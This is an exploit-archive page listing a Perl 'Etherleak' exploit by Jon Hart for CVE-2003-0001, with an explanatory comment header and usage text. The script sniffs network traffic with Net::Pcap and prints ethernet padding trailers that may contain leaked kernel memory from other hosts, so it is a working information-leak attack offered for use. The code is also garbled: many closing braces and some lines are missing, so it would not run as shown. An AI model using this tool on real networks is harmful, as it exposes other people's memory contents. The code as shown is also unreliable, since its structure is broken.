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zdtJon Hart1337DAY-ID-8875
HistoryMar 23, 2007 - 12:00 a.m.

Ethernet Device Drivers Frame Padding Info Leakage Expl (Etherleak)

Jon Hart

Exploit for multiple platform in category remote exploits

Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak)

#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would be come known as the 'etherleak' bug.  In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary.  This task is left up to the driver
# for the ethernet device.  The RFCs state that this padding must consist
# of NULLs.  The bug is that at the time and still to this day, many device
# drivers do not pad will NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published.  The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
# This code can be found its most current form at:
# Jon Hart <[emailΒ protected]>, March 2007

use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);

my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string); 

GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
            die "Unknown option: $!\n" && &usage();

if (defined($opts{'help'})) {

if (defined($opts{'read'})) {
   $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_offline failed: $err\n");
      exit 1;
} else {
   if (defined($opts{'interface'})) {
      $iface = $opts{'interface'};
   } else {
      $iface = Net::Pcap::lookupdev(\$err);
      if (defined($err)) {
         print(STDERR "lookupdev() failed: $err\n");
      } else {
         print(STDERR "No interface specified.  Using $iface\n");

   $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_live failed on $iface: $err\n");
      exit 1;

my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
   printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));

if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
   printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));

if (defined($opts{'write'})) {
   $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
   if (!defined($pcap_save)) {
      printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));

Net::Pcap::loop($pcap_t, -1, \&process, "foo");

if (defined($opts{'write'})) {

sub process {
   my ($user, $hdr, $pkt) = @_;
   my ($link, $ip);
   my $jump = 0;

   my $datalink = Net::Pcap::datalink($pcap_t);
   if    ($datalink == 1) { $jump += 14; }
   elsif ($datalink == 113) { $jump += 16; }
   else { printf("Skipping datalink $datalink\n"); return; }

   my $l2 = NetPacket::Ethernet->decode($pkt);
   if ($l2->{type} == ETH_TYPE_IP) {
      $ip = NetPacket::IP->decode(eth_strip($pkt));
      $jump += $ip->{len};
   } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
   else { 
      # assume 802.3 ethernet, and just jump ahead the length
      for ($l2->{dest_mac}) {
         if (/^0180c200/) {
            # spanning tree
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         elsif (/^01000ccccc/) {
            # CDP/VTP/DTP/PAgP/UDLD/PVST, etc
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         } elsif (/^ab0000020000/) {
            # DEC-MOP-Remote-Console
         } else {
            # loopback
            if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
            printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;

   if ($hdr->{len} > $jump) {
      my $trailer_bin = substr($pkt, $jump);
      my $trailer_hex = "";
      my $trailer_ascii = "";
      foreach (split(//, $trailer_bin)) {
         $trailer_hex .= sprintf("%02x", ord($_));
         if (ord($_) >= 32 && ord($_) <= 126) {
            $trailer_ascii .= $_;
         } else { $trailer_ascii .= "."; }
      # ignore all trailers that are just single characters repeated.
      # most OS' use 0, F, 5 or a.
      unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
         unless ($opts{'quiet'}) {
            print("#"x80, "\n");
            printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
            if ($l2->{type} == ETH_TYPE_IP) {
               printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
         if (defined($opts{'write'})) {
            Net::Pcap::dump($pcap_save, $hdr, $pkt);

sub usage {
   print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.

   CVE-2003-0001, and countless repeats of the same vulnerability.

   [-h|--help]                  # this message
   [-i|--interface] <interface> # interface to listen on
   [-f|--filter] <pcap filter>  # apply this filter to the traffic
   [-r|--read] <path to pcap>   # read from this saved pcap file
   [-w|--write] <path to pcap>  # write tothis saved pcap file
   [-q|--quiet]                 # be quiet
   [-v|--verbose]               # be verbose



# [2018-02-18]  #